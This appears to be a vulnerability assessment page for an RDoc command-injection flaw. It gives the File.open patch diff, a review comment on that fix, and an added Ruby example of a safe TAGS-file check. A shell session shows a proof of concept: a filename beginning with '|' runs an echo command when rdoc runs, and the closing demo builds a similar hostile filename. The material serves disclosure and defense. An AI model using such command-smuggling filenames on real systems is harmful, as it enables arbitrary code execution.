In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.
Recent assessments:
wvu-r7 at May 03, 2021 1:43am UTC reported:
Perlisms strike again in this RDoc command injection. Kernel#open is not safe.
File is lib/rdoc/rdoc.rb.
##
# Removes file extensions known to be unparseable from +files+ and TAGS
# files for emacs and vim.
def remove_unparseable files
files.reject do |file, *|
file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
(file =~ /tags$/i and
- open(file, 'rb') { |io|
+ File.open(file, 'rb') { |io|
io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
})
end
end
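Review bot: Replacing the bare `open(file, 'rb')` with `File.open(file, 'rb')` on the `tags$` branch is the right fix, because Kernel#open is the call that treats a filename beginning with `|` as a command to spawn, whereas File.open only ever opens a path; suggest a one-line comment at that call site stating why File.open must be used, so a later tidy-up does not shorten it back to `open`. Note also that `io.read(100)` returns nil on an empty tags file; the `=~` tolerates nil, but a `.to_s` would make that intent explicit. Any other bare `open` in lib/rdoc that receives a filename gathered from a scanned directory deserves the same review.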
wvu@kharak:~/Downloads/poc$ cat vulnerable
cat: vulnerable: No such file or directory
wvu@kharak:~/Downloads/poc$ touch "| echo HACK THE PLANET > vulnerable # tags"
wvu@kharak:~/Downloads/poc$ rdoc
Parsing sources...
100% [ 1/ 1] | echo HACK THE PLANET > vulnerable # tags
Generating Darkfish format into /Users/wvu/Downloads/poc/doc...
Files: 1
Classes: 0 (0 undocumented)
Modules: 0 (0 undocumented)
Constants: 0 (0 undocumented)
Attributes: 0 (0 undocumented)
Methods: 0 (0 undocumented)
Total: 0 (0 undocumented)
0.00% documented
Elapsed: 0.1s
wvu@kharak:~/Downloads/poc$ cat vulnerable
HACK THE PLANET
wvu@kharak:~/Downloads/poc$
Assessed Attacker Value: 4
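The patched TAGS-file check, rewritten as a stand-alone Ruby method with a small guard that flags pipe-prefixed names before any legacy `open` call; this is an added example, not RDoc's or the assessor's code, and the filenames and file contents it creates are constructed for the demonstration.

```ruby
require 'tmpdir'

# Names that Kernel#open would interpret as a command pipe rather than a path.
# Useful as a guard in code that still has bare open(...) calls on scanned names.
def pipe_prefixed?(name)
  name.start_with?('|')
end

# Mirrors the patched RDoc check: a file whose name ends in "tags" counts as an
# emacs/vim TAGS file if its first 100 bytes look like one. File.open is used
# instead of Kernel#open, so the name is only ever treated as a path.
def tags_file?(file)
  return false unless file =~ /tags$/i
  File.open(file, 'rb') do |io|
    head = io.read(100).to_s # read(100) returns nil on an empty file
    !!(head =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/)
  end
rescue SystemCallError
  false # unreadable or vanished file is simply "not a tags file"
end

# Demonstration on constructed files in a throwaway directory. With File.open
# the hostile name is read as data; no "marker" file is ever produced.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      hostile = '| echo pwned > marker # tags' # constructed hostile filename
      File.write('tags', "!_TAG_FILE_FORMAT\t2\n") # constructed vim tags header
      File.write(hostile, "not a tags file\n")
      {
        real_tags: tags_file?('tags'),
        hostile: tags_file?(hostile),
        flagged: pipe_prefixed?(hostile),
        marker_created: File.exist?('marker'),
      }
    end
  end
end
```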